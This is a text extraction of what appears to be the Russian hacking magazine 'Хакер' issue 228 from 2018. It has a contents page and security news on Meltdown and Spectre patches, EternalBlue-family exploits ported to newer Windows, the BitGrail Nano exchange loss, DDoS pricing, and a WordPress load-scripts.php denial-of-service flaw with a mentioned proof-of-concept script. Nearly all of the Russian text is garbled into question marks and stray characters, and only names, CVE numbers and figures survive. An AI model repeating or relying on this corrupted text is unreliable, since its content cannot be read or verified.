close

Вход

Забыли?

вход по аккаунту

?

ХАКЕР №228 2018

код для вставкиСкачать
????�18
?�8
CONTENTS
MEGANEWS
???�????�?�??�?????�????
???�????燗ndroid
???�??�??�?,�??�????�?��??�??�??�?�?????
??�??�???�???�??????
???�???�???�營CO��??�???�???�?��????�???�????�????
???�??�??�???�?�??營CO
???�???�?�??????�??�????�?????�??�??????��????營CO
???�??�??�??�???
????�?�??�?????��??�???�???�?�????�???�??�??�??�??�??�?�燱indows
??�?牜???�?粻??????,��??��??�?!
??�????�?��???�??????�??�????�???�?燱i?Fi
??�??�??�?牜????�?�
????�?�??�?????燬QL????�????�??�???�????�?�?�??�???�??�????�?�燡oomla
????�???�??�????
???�???�?�??�????�?�??�??�?�??�?????�??燬SL/TLS��??�?????�??�??�?
][??????�??:�??????�??�?�?�???�???
???�??�???�??�?????�?�??牜????�?????�??�?????�?�
??�??�??�???
????�?�??�??�??�?????�??�????�??�??�??????��?燩alo燗lto燦etworks
????�?�?�??�??�?
???�??�???�???�???�??�?????�???燱indows��???�???�??�??�?
???�??�?????�??�?
????�?�??�??�??�?????�????�??�??????��??�?????燬quirrelMail
???�????�??�????�??
????�???�??��????�??�???�??��??????燜rida
??�??�?????�??�???�????�?
???�???�???爄OS�,�??�??�??�??��??�?????�?�????�????�???�?
??�??�??�?燗ndroid
???燗ndroid�????�???????�??�??�????��??????�????�???�?????�??
Android�??�???�????
??�???�???�???�???��???�?�燣inux
??�???�?�???�??�燣inux
???�??????,�????�?????�??�?�???�?��??�???�???�??�???
WWW
??�????�??�??????�???
??�???�????�???
????�?�???�?????,�?????�?�?�??�???�??�爏andbox????�????
Mining燩ool�?燡ava
??�??�??�??�????�??�??�???????�??
???�??��???�?
????�?�??�?????�??????�??�??????�?�????�?燦odeMCU�+燗zure營oT燞ub
??�???�?�?????�???�???
??�??????��??????:�?????�?燞ackerU
???�????��???�???
???�?????�??,�??�??�???�??��??�?燣inux????????
PICO?8
??�???��????�?�????�?????�???�????,�??????�????�?�?�???
?????牜Mifrill粻????????
nefedova@glc.ru
?????�??????
?????
???�??�???�?� ??????� ???� ??????�???�?� ???�???�??� ???�????�??� Meltdown
?燬pectre,�??????�??�????�?�???�????�?�??�??�????�??��?�???�??
???�??�???�,�??�???�???�?,�?????�???.
??�??�?,� ???� ???�????� ?� �????粻 Meltdown� ?� Spectre� ???�??� ???� CVE:
CVE?2017?5754�(Meltdown),燙VE?2017?5753�(Spectre,燰ariant��燙VE?2017?5715
(Spectre,燰ariant�.�???燤eltdown�燬pectre,燰ariant���?????�??�?�?????�
????�?�???�?�?,�?�??�??�?????�????燰ariant�??�???�??�?�???????�
???� ???�??�?/BIOS/???�?????,� ?????� ????� ?� ???�???�???�??� ???�????� ????�
?????�?????�??�????.
???�??� ?� Meltdown� ?� Spectre� ???�??�?� ????�?� ???�?????�??�???� ???�?.
???�????�?�???�???????�??????�??��???�????�?????�???��?????�?
????�?� 2018� ????� (????�??� ???????� ???�??� ?� 90� ????� ??� ????� ???� ????
?????�???�?�??�???�?��???牜???�???????�??�???�??�????�??��??????�
?????�??�??�).�???�?�???�?�??�??��??�??�???�?�???�?,���??????�
????� ??????� 2018� ????� ????�???�?????� ???�?????� ???????� ???�?� ????�
??????�??�?�??????�???�??�??????�????,�??�?�??�??�???�???�????�
??,�??�??�??.
?�?????�???�??�?�??�??�?�??�??�??�??�???�??�???�??�????�???
?� ????�?.� ??????�????� ???�?????� ?????�????�?� ?� ??????�???� ????�?????�
????� ??????�??,� ??�???�?� ?????� ?� ??????� ???�??,� ???�???�???�?� BSOD
?� ???�??�??????�????,��??�?�????�?� ???�???�??�???�?????�????.��???�
??� ?� ???�?� ????�?� 2018� ????� ???�????� Intel� ???�???�?� ???�???�???�?� ????�
???????�????�?????�????�??�??�????�?燬pectre�(Variant�,�???�??�????�
??????�??��??�???�???�??�?????�??�???�?�??�???�?�?????�???�???�
???�??�??????.
??�??�??�??��??�??�??�?�???�???營ntel�???�?�??�???????�????
???�?????� ???� ???�??�????� ??� ????�??�???� Skylake,� ?� ???�?� ???�?� ???� Kaby
Lake� ?� Co?ee� Lake.� ???????�??� ????�????�???� ???� ???�???,� ????�???
?� ????�???� ??????�??� ???�??�????� ?????�?� Intel� Core,� ?� ???�?� ???�??�????
Intel燙ore燲,營ntel燲eon燬calable�營ntel燲eon燚�(???�?????�??�??????�??????�
????�?��???????��???????�???).
??�??� ???�????�???� Intel� ????�??�???� ???� ????� ???????�??� ???????�?
Microcode� Update� Guidance,� ???�????� ??????�?� ?????� ???�?????� ??????
???� ???�???�??� ???????� ???�??�????� Haswell� ?� Broadwell.� ???,� ??????�????
???????� ???????� Broadwell� ?� CPUID� 50662,� 50663,� 50664,� 40671,� 406F1,
306D4� ?� 40671,� ?� ???�?� ???� ???�??�????� Haswell� ?� 306C3,� 4066,� 306F2,
40651��6C3.�??�????�?�??????�?????燙PUID�???�??�?��??�??�????
?????燲eon�燙ore.
???�?� ????�???,� ???� ???� ??????� ??� ???�?????� ???�?,� ???????� ???�??�?
?????�???� Intel.� ???�??� ????� ????� ???� 16� ?????� ???�??�????,� ?� ???� ???�?
????燬andy燘ridge�營vy燘ridge.�??�???�??�???�?????�?????�????�??�??
????�??,�????�??�???,�??�??�?????�??????�?��??�????�?,�?�??�???
Pre?beta�燘eta.
???�??�????� ???�??� ??????� ???�??� ????�???� ???�?????� ??� ????�?� ?????�
??????�??.� ?� ???�?� ????�?� 2018� ????� ???�?� ??????�?� ??????� ???� ??� ?????�
??????� ?� ???�????� ???�?????� ???�????�??� ???�???� ???�???�?� Intel,� AMD,
ARM,燗pple,燗mazon,燝oogle�燤icrosoft,�?????�????�???�?��????,�??????
????�??�??�??�??�??????�??�?�??�????�??燬pectre�燤eltdown,���???�
?????�??�????�?????�??�????,�??�?????�??�????�?�?????�????.
???�????� ????�??????� ????�???,� ???�?� ??????�?� ??????� ???� ??� ?????�
??????� ?� ???�????� ????�???� ???�????� ?� ????�?,� ???�??� ???�????�??� ?????�
????�??.� ???�???�???�?� ????�???� ??� ????� ???�??� ???� ?� ??????� ????�
????�18�???,�???�?�?�???�?�???�???�???�???�???�??�??.
??�??�??� ???????�??�??� ?� ????�??�??� ????�????�?� ????� ?????� ????�
?????� Intel.� ?� ???�???�?,� ????�??�???�?� �????�???粻 ?????�?� ???�???� ????
??�???�?�??????�??�????:
�?� ????�?� ???????�??� [?� ???]� Intel� ???�??�???� ???�??� ?� Spectre
?燤eltdown�???�??�??�???�?,�??????�??�?�?????營ntel�???�???
???????�????� ????�?????�??� ????�??�??� ???�??????�,� ?� ???�??� ????-�
??營ntel.
???�????�?� ???� ????�???,� ???� ????????�??� Intel� ???�?� ???�????�??� ??????
????�??� ?� ???�??�??� ???�?????�??,� ??� ???�????� ?� ?????�?????� ?� Spectre
?� Meltdown� ??????,� ???�?� ????�?� ???�?� ???.� ????� ????�????�??�??� ????�?
???????�??� ?� ????�?� ??????�?� ???�????� �???�???� ????� ???�?� ??� ?????�?
??????�????粻 ?� ???�?????� ?� ????�????� US?CERT,� CERT/CC� ?� ???????
?????�???�????.
???�?�??�??�?????�???�?�???????�?�??�????�??�??�??�???燬pectre
?燤eltdown�?�??�????�??�??�???�?????????�???,�??�??�?��??�?�???,
???�????�???�???��??�???�???�?�??�??�??�?�???�???�??�????�??�???�
?????�?� ??� ????�??.� ??� ???� ????�??�???�?� Intel� ????�???,� ???,� ???�????� ??
???�??,�???�??�??�??�?????�??�??�??????�??�???�?�????.��????
??� Intel,� ???�?� ???� ?� ????�??�???�?� ???�??� ???�????,� ???????�???� �?????�
???????粻 ????�??� Spectre� ?� Meltdown� ?????� ????�?� ?� ????�???,� ???
???????�??� ??� ???????�??� ???????� ????�???�??�???� ????� ???�????
?� ?????�???� ????�??�???� ???�???�??.� ???�?� ???� ???�??� ????� ????????
?????�???�????�?�??�??�??�??�??�?�??�????牜?????�.
??�????�??�??�?�??�?�????�???�??�?���??�????�??�???�??�??�??
???�????.��??�???,燤icrosoft�???�???:�???�???�??�????�??????�??�?
?� ???,� ???� ???�?� ???� ???�????�??� ?????� ???�???�?????� ?� ??????�???� ?????�
?????�???�??�??�???.�??�????�???�???????�??�??�?????�??�???�????�
???� ?????�??� ???????,� ????�?� ???�???� ???� ???�?????� ????�?� ????�?,� ???
???�???�?�???�???�?�??�???�???�???�燤eltdown�燬pectre�??�?�???.
37%�??�??�???�???�?????�??�??�??�?????�
????�?????
???�???�?牜??????�????�??�??�??�?粻???�??�???,�??�??�???�??�????�??�??�????�????�
??????�??�?????�???.
?� ???�???�?,� ????� ???�?� ???�?????�??� ?� ????�????� ???�?� ???????.� ??� ????�??� ?� ???�??
??????� ????�?� ???� ??????�????,� ?� ??????�?� ????�?????�??� ???� ???� ???�?� ??????�?� ???????�
???�??�??�??�??�????�??????,�??????�?�????�????�???.
28%�?????�???�??�??????�??�????��???�??,�� 9%��?�??�??�?????,�??????�????
?� ?????�??�??.� 11%� ??????�?� ??????� ???�??�??,� ?� 8%� ???�???�?� ??� ?� ??????�??� ???�?
??�????�??�?.
???�????�??� ??� ???� ???????�???� ???�????� ???????� ?????�?� ?� ???�??� ??????�?� ?????� 6%
????�?????�??.
?????????�??
???�???�?????
WINDOWS
???�??� 2017� ????� ?????�???� ????�?� The� Shadow� Brokers� ????�?????�?
?� ?????�??� ???�???� �???�??� ??????�????�,� ???????�??� ?� ???�????�???
????�????.� ???�?� ??????� ????�???�???� ???�??�??� ?� ???�??�??�?,� ????�???�
???� ?� Equation� Group� ?� ????�????�?,� ??� ???????� ???�?� �??�?????�????�??
??????粻 ??� ???.� ?� ??????�???� ???�??????� ???????� ?????�???�????� ???�?
?????� ????�??� ????,� ???� ???�??�?� EternalBlue,� ???�?????�??� ??� ???�??�???�
???�??�????�?��??�???�?燬MB�(????�?�?�?????�????�?�??�??�???????�
?????�??�?????�???燱annaCry��??�17�???,��????�?�??�?�???燦ot?
Petya�燘ad燫abbit).
???�????�17�???�??�?????�?�??�????燫iskSense�??�??�??�(Sean
Dillon)� ?� ?????� ?????� (Dylan� Davis)� ????�???,� ???� ??� ???�???� ????�???????
???�??�?� EternalBlue� ???� ??????� ?� Windows� 10.� ?????�?,� ???� ??� ???� ??????
???�??�???� ???� ??????�??????� ?????� ?� SMB� ???� ???� ???�?????�?� ???� ????
??燱indows燲P,燱indows燰ista,燱indows�燱indows燬erver�03�燱indows燬erv?
er�08,�???��?????�??�??�???�?????�?�?????�??�???�???�?�??�????.
???�?� ?????�???�????� ???�???� ??????�???�???� EternalBlue� ???� ??????
?燱indows�燱indows�1�燱indows燬erver�12.
??�???��???�??????�??燭he燬hadow燘rokers�??�?�????�?????��???�
???�??�??�??,�??�??�????�?�????�????�??,�?�????�???�???�???�??.
???�??�??�??�?????�??�??�??�??�??�??�??????��17�???�?????
?�?????� ??�????�?�??�??�??�???�?.�????�???�???�??�???�???�?????�
??????� ????????� ???� ???�??�???� EternalChampion,� EternalRomance� ?� Eternal?
Synergy� ?????� ????�??,� ???� ??????� ???� ???�??�??�?� ?????� ??????�?????�?
???�??� ?????� ???�??� Windows,� 32????�?????� ?� 64????�?????,� ?????�??
??�??�?????��??�(???????�燱indows�00).
???�??� ???� ????�??????� ??????�??� ???�?� ??????� ???� Metasploit� ?� ?????�
???????�???????�???� ??燝itHub.�??,燙VE?2017?0146�(EternalChampion,燛ter?
nalSynergy)� ???�???�?� ????�???�?????� ???�?????� ???�?� ?????� transaction?
???�???,� ?� CVE?2017?0143� (EternalRomance,� EternalSynergy)� ???�??�??�???
????�???�???爐ype燾onfusion�??�?燱riteAndX�爐ransaction????�?????.
??�????� ???�????�???,� ???� ???�??� ???�??�??�?� ????� ???�???� ??????�
??????�?� ?� ???�??� ????�???� ?????�???�??� ?� ????�????�???� ???� ???�??????�
???� ?� ???�????�?� ????????�??� ?????�??� ????�??.� ??????�??????� ????� ????�
???�???� ???� ????� ???� ????�?� ???�????� ?????�?� ???�???� ???�???�????�?,
?�????�?�????�??????�?????�???�????�?�????�??�???�??�?.
?�???�?????�?�??????�???�???�???�????,�????�???????�??�???�??�???�??���????
??????� ?????� ????�???�?� ???�?� ??� ????.� ??� ????�????�?� ?� ???� ???�?� ????�?� ???????,� ???
??????� ????????.� ????� ??� ????�????� ??????,� ???� ???�?� ???�???� ????� ?????�????,� ???�????�
?????�???�?��??�??�??�???????�???�??�
?�?�????�??????�??�??�?????�?�???�??????�??�??????�??��??�?燭witter
?????燘ITGRAIL
?????????????
?????�?????
?????�?????� ????�??????�??� ???�?� BitGrail� ???�??�???� ??� ???� ????�??�???
???�???�????�??.��?????�?�????�?�?????�?�????��??�?????�????
Nano� (XRB,� ?????� ???�??� ?????� ???� RaiBlocks),� ???� ????�????�??� ???�???�
??�0�??�?????�??�????�?�?????�??�??????�??�????�???�???�????
??� ????�??�?.� ???�?� ???�????�???� ????�????� Nano� ???�?????�?� ??????�?
?�???,��?????�??�?�???�?�??�????�?�??�??�?�5�??�?????.
??�????�?,� ???� ?� ???�????�??� ????�????,� ????�??????�??� ???�???�?,
??????�??�?� ???�?� �????粻 ???� �??�?�.� ????� ????� ?� ???�????�?????� �????�
??????�??�??� ????�????�?�,� ???????� ?????�?� ????�?????� ???�??�?.� ?????�
????�?,� ???� ?� ??????�???� ???????�???� ????�??�?� ???�??�???� ????�?� ?????�
??????�?燦ano,�??????�?????�?�?�?????�?�??�?.�??�???�?????�???�
???�?� ???�???�????� ???� ???�????� ???� ????� ????�??????� ????�?,� ??� ????
????�?� ???� ?????�?� ?????�??� ????� ?????�????.� ?� ???�??�???�??� ???�???�
???�???�??�??�??�?????�??�???�???????�??�???�?.
??�???????��??�????�??�?�???�????�?????�(Francesco燜irano),�???�
??�????�???�??燭he燘omber,�?�????��??�?燭witter,�??�??�????�?�????�
??� ???�??????� ???????�??� ?????�??� ????� ???�??�??�??,� ???� ???� ?� ????�
??????� ???�?� ?� ???�?????�??� BitGrail� ????�???� ????� 4� ???�????� Nano,� ???
???�?????� ???�????�?� ???�??�?� 40� ???�?????� ???�????.� ???�?� ??????
????�??,�??�??�????�???燦ano�?�???�?�??�????�???�燘itGrail.
?� ?????� ??� ???� ?????�?� ???�????�?� Nano� ???�?????� ????�???????� ????
???�??�??�??�?????��??�????�??�??�?�??�???.�???��??,�??�?????
???�?� ??????,� ???�?� ???�????� ????�??�?� ???� ?????� ?????� ???� ?� ???�???�?
Nano.� ???�????�???� ?????�??� ???� ??????� ?� ??????�?,� ???� Nano� ?� ???�??
?????�?,��???�???�??�???�?????��?燘itGrail.
??�?� ????,� ???�????�???� ????�?????�?,� ???� ??????� ?� ????�??�???�?� Bit?
Grail� ???�?� ?� ???�??�??�??� ???�?,� ?????�??� ????� ??????�?� ??????� ??� ??
????�??� ??????,� ?� ????�?????�??� ?� ?????�?� Nano� Core� ?????�????�???�?
???????�?.� ???�?� ????�???,� ???� ???�?� ???�???�???�?� ???�????� ?� ?????�
??????�??� Nano� ???� ?� ????�?� 2017� ????,� ????�????� ????�?????�??� ????�
?????�?????� Nano� ?� Bitcoin.� ?????� ????�?????�??� ???�?� ???�?????� ????�?
??????�????,�??�???�????�?�????�?��??????�??????.
?�??�?�??�?�????�?燦ano�???�???�???�??????�?,��??????�?????
????�????�?????�?????�??�??????�??�?????�???�???�??�????.�??�?
???�?�??�????�???��??�?�???�?????�?�?????�??�??�??�????�?牜?????�
??????�??�??� ????�?????粻 ?� ????�???,� ???� ???� ????�??�???�?� BitGrail� ?????�
????�???��???�??�????�???,�????�???�??�??�???�??�???�???�???�???�
?????.
??�?�?�??�??�????��???,�???�???�??�???�?????�??�??�????�???
???�????�????� Nano,� ???�?� ???� BitGrail� ????�???� ?� ?????�????�??,� ??????�
?????��???��??�?�??????�爀xit爏cam.�??�?�???,�???�?????�?�??�???�
???�?????�??�?????�??�?????�???�????�???�???.
DDOS????�?�?�??�??�?�???????�??�?
??��??�????
????�???�?�??�????燗rmor�??�???�?????�??�??�?�???�??�??�????�??�??�??��??�???�
??��??�??�???,�????�?�??�??�??�?�??????�??��????�???�?????�??�?�???�?��??�???.
DDoS????�?�???�??�?�????�???�� 10�??�????�?�???�??�??� 200�??�????�?�???�???.
???�?�??�???�?????�?????��????�??�?�0?1200�??�????.
????�?� ???�????�???� ???�???� ?????� ???�??� 750� ???�????� ?� ?????� (?� ???????� ???�??�?????�
??????)�??� 1200�??�????��????�(?�??�??�??�??�????�?????).�?�??�????�??�??�???�
???�??�??�?�?????�??�0�??�????.
??�???� ???�??�???� ???????�???� ????�???� ???????� ???�???�???�?:� ????�?� ???????� Disdain
????�??�?�� 1400�??�????��????,�??�?�??�????�???�????�????燬tegano�??�?� 15�0
???�????��????.
????�??�??�???�??�?�?�??�????�??�?�??�??????��??�??�?�?�0?1500�??�????.
???�?????� ???�???� ???� ????�?� ???�???�??� ????�???,� ??� ?� ???????� ????�?� ????�??�???:
??� 50�??�????�?�??�??�???�??�??????�??????�??� 100�??�????�?�??�??�?�??燱ord?
Press� ??� 1500� ??� ??????� ???� Android� ???� 650?1000� ???�????� ??� ???�??� ???�??�???� ???� Mi?
crosoft燨f?ce.
?� ???�???� ???�?� ???�?� ????� ???�?????� ?????�???� ????�??� ?� ??????�??,� ???�?????� ???????
?????�????�?�?��??�????.
??????????�??
??????燞UAWEI�
ZTE
??� ???�??�??� ??????�??� ???�????�???� ??????�?� ??� ???�????� ??????� ????�
????�?� ???� ????�?????� ????�?� ????�??�??� ????�????.� ???�?� ???�?� ???�?
???�????�???�???????,�???�??�??,�??��??��???�????�??�??�????,
?????�?,� ???� ????�??� ???�????�???� ????�????� ??� ???�?� ????�?????�?
??????�???�?�??�????燞uawei�燴TE�????�???�????�??�??�?.
??�??�??� ???� ????�????� ???� (Chris� Wray)� ????�??,� ???� ???�?????�???
�??�???� ????�???�??粻 ???�???,� ???????� ?????� ???�??????,� ????� ???�?????
???????�??�??�????�??�???�???�??,�??????�???�???�???�??�?????�???
???�?� ????�?� ?� ??� ???�???�?� ???�????�???� ???�?????,� ??????� ???????�
??????� ???????� ?� ???????�?????�???�??� ?????� ???.� ???�?� ???� ???????
?� ???,� ???� ???� ???� ???�???� ???�????�???� ??????�???�??� ?� ??????�?� ????�
???,� ???�?� ????,� ???�????� ???� ????�???�??� ?� ?????� ??????�??� ??????�?
????�?????�??�???????�??�???�???�??�??�?.
?� ???�?� ????�????� ???�?� ????�????� ???�?� ??????�?� ???�????� Huawei
?燴TE,�??????,�?�?�??�??,�??�?�??�???�?�???�???�???�??.
???�?� ????�???,� ???� ???�??� ?????�?� ???�????� Huawei� ???�???�???�?
??????�???��?????�?�??�????�???�????�,��??�???�?,�??�???�???�???�
??????� ???�????�??� ?� ???????�?????�???�??� ???�???�??� AT&T,� ????�?
?� ????�?� 2018� ????� ????�?� ???�?????.� ?,� ???� ?????�??�?� ???,� ??� ???�??
???�??�???�?�???�?�????�??�????�?�??�???�???�??�??.
????�??�???�?� Huawei� ?� ZTE� ???� ??????�?� ????�??�??� ????�?????�?
???????�???�??�????�???�???�????.�??,�燞uawei�????�?,�??�??�??�??
???�????�?????�?�??�?????�???��???�?????�?�0�????�???�燞uawei
????��???�??�?�????�???�?�????�??????�????,�??��????�??�??�???�
????�?????� ?� ???????� ???????�???�?????�?????�???�??� ???�??????.� �?
???�???�?�????�?��???�????�?�???,�??�???�?�,��??�??�??�?�????�
???�???�?�??�????.
???�????燴TE,��???�??�???,�???�???,�??��??�?????�???�???�???
????� ????�???�????� ???????� ??� ???�????�???� ???�?� ?� ????�?� ???�???�?
???�???�?�??�?????��???�??�??�??�??�??�???�??.�??�?��??�????
????�???,�??�???�???�??�??�??�??燴TE�??�??�??�?�???�?�??�???�???�
???��??�??�????,�??�???�????�??�??��??�??�??�????�??.
700�0�??�????�??�??�???�??�??�???
??燝OOGLE燩LAY��17�???
????�????燝oogle�??�???�??�?�17�???.
???�???�?燝oogle�??�??�???,�??��???�???�??�??�???�??�??�??�燩lay燬tore�??�???�???�
????�?� ???�??� ???????�??� ???�???�??.� ???�?� ???�???�????�?� ??????�???� Unicode� ?� ??????�
???????�??�??�?,�??�?�?????�??�????�??�???�??�?�????�???�??�????,�??�????�???
???�????.
??�??�?�??�????�???�?????�?�??�???�??�???�??�???�????� 700�0�??�????�??�???�
????�??� ?� ???�?????�???� ?????� 100�0� ?????�??????�???� ???�????�????.� ???� ??????�???
???�?�?�%�??�???�?�?????�???�16�???.
???�????�?�??�????�???�?????�?�??�???�??�????�???�????�0�0�??�???�???????�
????�??.
15�0�0�???????
?????????
??�????�??牜?????�???粻???�???????�??燬kyTorrents�???�??�???�???�????�
????�???�?��??�????�??�??�????��??�????.
SkyTorrents�??�??�??�??�?�???�???�????,��??�?�??�???�?�??�???
???�?� ?????�?,� ???� ??� ??� ???�?� ??� ?????� ???????� ???�???.� ????� ???�??
?????????��??�?�???�????�?�???�????,�??�??�??�??�??�??�???????�
?????,��??�??�???�??�?????�??????�???�???????�???�???.
�???�???�??�?�??�??�??�?�??�???�??�????�??�??.�??�?�???
????�???�??�????�??�???????,�?�????�??��??�?�????�??�????.
???�?� ??� ?????� ????????� ??????� ?????????� ???,� ???� ???�?� ???-�
?????�??� ??????�??,� ???�???�?� ????� ????�???� ?� ????� ??� ???-�
???????� ???�??�???� ??� ???�???� ??????�??�??� ????�,� ?� ??????� ???-�
????�?燬kyTorrents�??�????.
?� ??????�??,� ???????� ???�???????� ??� ???�????,� ???????� ????�?????�?
????�???�???�????�?.燬kyTorrents�????�??�??�????�?�??�??,�??�?�???
?????� ??????�?????� ???�???�?� ???�?????� ??????�??� ?� ????,� ???�??� ???�?
?????,� ?� ????�?� ?� ???� ???�???�???� ?� ???�???� ??� ?????�????� ?????�?.� ???,
???�????�??�??�?�??�????�?�00�??�????,�,�???�???�??�??�???燬ky?
Torrents�?????�???�???????�????�??�????,�??�?�???�??�????�?.
?� ???�?� ????� ????� ????�?????�?� ???�?� ???�???�???� ???�???�??� ???�???
??????�???�???� ??????� ???�???�???� ???�???,� ???� ???� ????� ???�?????� ????�
?????��??�?�?�???�????��??�???�????�??�????�??�?.�??,�???�???�
???�??� SkyTorrents� ????�?� ???�??� ??� ???�?,� ?� ???� ???�?� ?????� ????,� ???� ????�
????�??�??�???�???�??�??�????�???�?????�??.
???� ???� ????�?� ?� ?????�?� ?� ???�?� ?????�?????,� SkyTorrents� ???� ??� ?????�
?????�?????,�??��???�??�???�??�????.�???�?�??�??�?�???�?�???
?� ??????.� ???�?� ????� ???�???�?� ?????�?� ????�???� ??�???�???� ????,� ????�
??????�???� ???�?� 15� ???�?????� ???�?????.� ?????� ????�???� ?????� ????�
??????� 444� ?????� torrent????�??� ???� ???�???� ????�?� ????,� ???????� �????�
322�????.
??�??�?� SkyTorrents� ????�???,� ???� ??????????,� ???�???�????�???� ?????
?????�?,� ???�????� ???�??,� ???�??�??� ???�?????� ????� ???�??�???� ??� ????�
????牜?????�??�?粻????�????�??.�???�??,�??�?????�?�???�???,�???�????�
????�?�??�???�??????�??�??�??�????��???�?�??�?????�??�?.
?�???�??� ???�??�????� ????�??????� ?� ??� ???�??�????.� ?� ?� ??� ?????,� ???� ???� ??????.
??????,� ???�?� ?� ???�?????�??� ????� ???�???????� ?????�?????� ????�????� ?????�??� ???????,
????�????� ??� ????�?� ???????,� ?� ???�?� ????�?????�??� ???�????�??.� ?� ???�?????� ???�?� ?????�
??????�?� ??????�???�?� ???� ?????�?� ???�?????� ?� ???�??� ???�??????,� ???� ???� ???� ???�??� ????�
???????,� ???????� ???�?� ???�????� ???�????� ?� ????�?� ?????.� ???�?� ?� ???�??,� ???� ???�?� ????�
????�??�??�??�??�?????營CO��???�??????�??�???�???????�??�?��??�?????�??�??�????�
????�
?� ????� ???�?� ????�???� ??� ???�??� ????�?????�?� Reddit� ?� ????�?????�??� ?� ????� ???�??� AMA
(Ask爉e燼nything,牜????�???�???��??�???�?�)
??????????? ??????
?
? �?????�?????
ANDROID燩�?????
?????????????
??�????� XDA?Developers� ????�???,� ???� ?� ?????� ???�??� ???�???�????� ????�
????� Android,� ???????� ????� ?????�??� ???� ???????� ???�???�?� Android� P,
??????�?�??�??�???�????,�??�??�??��??????�?????.
???,�燗ndroid燨pen燬ource燩roject�(AOSP)�???�???�???�?�??�??�???,
???????� ????�???� ????�???�???� ??????�???� ?� ???????� ??????� ???�????�
???,�?�??�????�?�???????�??�??��??�?????�??�?????�?????�???�???�
??�??�???�???�???�??.�??�????�???�????,�??�??�??�???�??�??�????�
????� ??????� ???�??� ???�??� ????�?????�??.� ????,� ???�????� ???�???�??
???�??��?????��??�?????,�??????�????�??�???�?�????�???�?��??,
???� ????�???�???� ???�???�??� ?????� ??????�?????� ???� ???�??�????�????
??�??�??�??,�?�???�???�??�??�????�?.
???�?� ???�???,� ???� ?????�??� ????�???�??� ???�?????�???� ???�?,� ???
???� ??????�???�???� ???� ??� ????� ???� ???�??�??�???� ???�?????� ?� ??????
??????�??�??�????�??�???�??�???�?�?�?�??�???�???.
???�???�?,� ???� Android� P� ???�??� ???�????� ???� ???�?????�??
?�??�18�???,�?�???�??�??�??�?�????�??�??�?�??�??�??�???�???
???????�??�?��??�???�???�??�????�??燝oogle營/O.�??�????�??�????
?????� ???�??� Android� ???�?????�??� ???�???�????�?� ??� ???????????�
?????�18�???.
???�??�??�????�???�?????�??燬TACK燨VERFLOW
??????�??????�???�?
????�??�??�???�??�???�?燬tack燨ver?ow�??�????�????�??�?�??????�???�???????�???
????,�??�?�??????�????�??�???�??�??�???�?�?????�?�???�??�?�??�????�????.
??� ????� ???� ?� ????�?� ???�???� ????�??� 101�2� ????�?????�?,� ???????� ????�?????� ????�???
??�??��??�??�??�???�?????�??�????.�???�?�??�????�???????�?????�???.
??�??�??�??????�??�??�???�???�????�???�??�/�??�????�/�??�????�??�???�?
??�??�??????�??�???�???�?
??�??�??????�??�???�??�??
??�??�??????�???�??�???�???�???�????�???�??
??�??�??????�???�???�???�????�???�??�??�???�??�??
????,�??????�??????�???�??�??�?????�?�???�?�??�?
????�??�??�?,�????�??�?????�??�???�?�??�??��??�??�???�??�??,��??�?�??�?
???�?�??�????�?�??�?????�??
WORDPRESS:
?????????
??????????
5� ???�???� 2018� ????� ???�????�???� WordPress� ????�?????�?� ?????� ???�??
CMS�(WordPress�9.3),�??????�??�??�???�????�???�??�??�??�???�??,
??� ?� ???�?� ???�??�?� ???????�?� ????????� ????�???�??�??� ???????�??,� ????�
????�???燙MS�????????�?�????�??????�?,�??�???�??�???�?????�?.
??�?� ????�?� ???�??� ??????�?� ?� ???� ??� ???�?????� ????� ???�?� ???�??
WordPress�9.4,�??�??�??�???�???�??�???�??�?????�??�???�???�????�
???�??� ???????�??,� ???�????� ???�??�??� ????�???.� ????� ?� ???,� ???� ?????�
??????�?,� ?� ???????� ???�???� ???????�??� ???� ???�?????,� ??� ??????�?� ?????�
????�??�???� ??????�????� ?� ????� WordPress� 4.9.4,� ???� ?????� ????� ??� ?????
?�??�????�??�????.�??�???�??�?�??�??�9.4�??�??�??�??�??�?�???�
?????�???�??????�??�???�??,�?�?????�??????�??.
???� ????� ?????�??� ???????� ?� ???,� ???� ?� ???�?� ???�???� (4.9.3� ?� 4.9.4)
??????�??�??� ????� ???� ????�???� CVE?2018?6389,� ?� ???????� ?????� ????�??
??????�????� ????�??�???� ??????�??????� ?????� ??????� (Barak� Tawily).� ???
???�????�??燚oS????�??????�??�???��??????爈oad?scripts.php.�?�???,�??
???�???�?� �??�???粻 ????�????�?� ?????� ???�????� ????,� ???�?????� ???� ????�
?????�?�???�??????�??�??�???.
??�???�???�????,�??�??�?????�????�??�?????爈oad?scripts.php�??�?????
???�??�?????�??�?燡avaScript�???�?,�???�?�??????�??�?�燯RL.�????
???�?� ???�?????� ????� ?????� ??????� ????????� ???�?????�?� ???�?????,� ????�
?????� ???� ????�?� ?� ????�?� ???�?????� ???�???.� ??????�???,� ???� ??????
????�?� ??????� ???�???� ???�???�????�?� ??� ????�??� ????�???�?????� ?????
?� ?????�???�??,� ????�?� ?????�???�???� ???�??� proof?of?concept� ???�??�?� ?
????�??� ??????� doser.py,� ???????�??� ??� Python.� ??????� ??????�???� ???�???�
???� ?????�??� ???�????� ??????�?� URL.� ???�??�?� ???�?� 500???� ???�???
????�??� ????,� ??????�???� ??� VPS????�???,� ?????�???� ????�???� ???�?,
�???�??粻????�???�?�2,�3��4.
???�??????� ???�??�????,� ???� ?� ????�?� ?????�??�?� ????� ??� ????�??
�???????粻 ??????�???� ???� ???????�???� WordPress� ????,� ???�??????�??
??� ??????�??� ???�??� ???�???,� ????�?,� ????� ?� ???�?????�??� ???�????�?
????�??????�????�??�??�???�?�????,�??�?�??�???�?�???�??�??�?????
?????�?,� ???�??� ???�??�?� ?????� ???�?????� ???� ???�???�????�?,� ??????
????�??燚DoS.
??�?�?????�??�?�??�????��???�???�??�????�????燙MS,�?�?�??�?
????�????�??� ???�??????� ???�????�?� ????�????� ?� ????�???,� ???� ??????
?????�???�???�??�?�?�???�?�??�???�??�???,�?�?�?�???�?�??�????�
???.�???�?�?????�???�??�??��??�???�??�??�9.3��9.4,�??????�???�
?????�????�?�??�??�?�???�?????.
?�?????�??,爌roof?of?concept�??�??�?�??燙VE?2018?6389�??�??�??�?
???�????� ?� ????.� ?????� ????,� ???�?????�?� ???�????� Imperva� ???�?????�?
????�???�??�??�??,�??�??�?????�??�???????��?????�?�?????�?????
?�???�???,�??�??�?�??�??????�???燱ordPress�??�??�????�???�??�??,
???????�??�??�??�???�??�??�??.
??�???�???� ???�???�?� ???�??,� ??????� ????�??????� ??� GitHub� ????�????�
???� ????燱ordPress,� ?� ???????� ???�??????� ?????�???.� ???�?� ?????�???�???
